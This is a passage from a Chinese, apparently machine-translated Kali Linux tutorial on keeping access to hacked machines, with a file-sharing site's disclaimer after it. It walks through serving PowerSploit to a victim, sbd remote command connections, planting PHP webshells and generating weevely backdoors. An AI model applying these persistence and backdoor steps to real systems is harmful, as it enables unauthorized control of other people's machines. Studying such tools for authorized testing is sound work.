个MD5哈希,它似乎是一个域缓存凭证。12、KaliLinux-维护访问在本章中,我们将看到Kali用来保持连接和访问被黑机器的工具,即使它再次连接和断开连接也是如此。权谋这是一个适用于Windows机器的工具。它在受害者机器上安装了PowerShell。该工具帮助黑客通过PowerShell连接到受害者的机器。要打开它,请打开左侧的终端并键入以下命令以进入powersploit文件夹-cd/usr/share/powersploit/如果你输入“ls”,它会列出你获得访问权限后可以下载并安装在受害者机器上的所有powersploit工具。大部分都是根据名字自解自明。在受害者机器上下载此工具的一种简单方法是创建一个Web服务器,powersploit工具允许使用以下命令轻松创建该服务器-python-mSimpleHTTPServer在此之后,如果您输入:http://<Kalimachineip_address>:8000/以下是结果。SBDsbd是一个类似于Netcat的工具。它是可移植的,可以在Linux和Microsoft机器上使用。sbdfeaturesAES-CBC-128+HMAC-SHA1encryption>基本上,它有助于在特定端口上随时连接到受害者的机器并远程发送命令。要打开它,请转到终端并键入“sbd-l-pport”让服务器接受连接。在这种情况下,让我们将端口44放在服务器将侦听的位置。在受害者的站点上,键入“sbdIPofserverport”。将建立一个连接,我们可以在其中发送远程命令。在本例中,它是“localhost”,因为我们在同一台机器上执行了测试。最后,您将在服务器上看到已建立连接,如以下屏幕截图所示。网壳Webshel​​l可用于维护访问或破解网站。但其中大多数都被防病毒软件检测到。C99phpshell在防病毒软件中非常有名。任何常见的防病毒软件都可以轻松地将其检测为恶意软件。通常,它们的主要功能是通过Web界面发送系统命令。要打开它,请在终端中输入“cd/usr/share/webshel​​ls/”。如您所见,它们根据编程语言分为几类:asp、aspx、cfm、jsp、perl、php如果进入php文件夹,可以看到所有php网页的webshel​​l。要将shell上传到Web服务器,例如“simple-backdoor.php”,请打开webshell的网页和URL。最后写cmd命令。您将获得如以下屏幕截图所示的所有信息。威利Weevely是一个模拟telnet连接的PHPwebshell。它是一种用于Web应用程序后期开发的工具,可以用作隐形后门或Webshell来管理合法的Web帐户,甚至是免费托管帐户。要打开它,请转到终端并键入“weevely”,您可以在其中看到它的用法。要生成shell,请键入“weevelygeneratepasswordpathofffile”。如以下屏幕截图所示,它是在“桌面”文件夹中生成的,文件将上传到网络服务器以获取访问权限。如下图所示上传webshell后,我们可以使用命令“weevelyURLpassword”通过cmd连接到服务器,您可以看到会话已经启动。http隧道http-tunnel创建一个在HTTP请求中隧道传输的双向虚拟数据流。如果需要,可以通过HTTP代理发送请求。这对于限制性防火墙后面的用户很有用。如果允许通过HTTP代理访问WWW,则可以使用http隧道和telnet或PPP

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论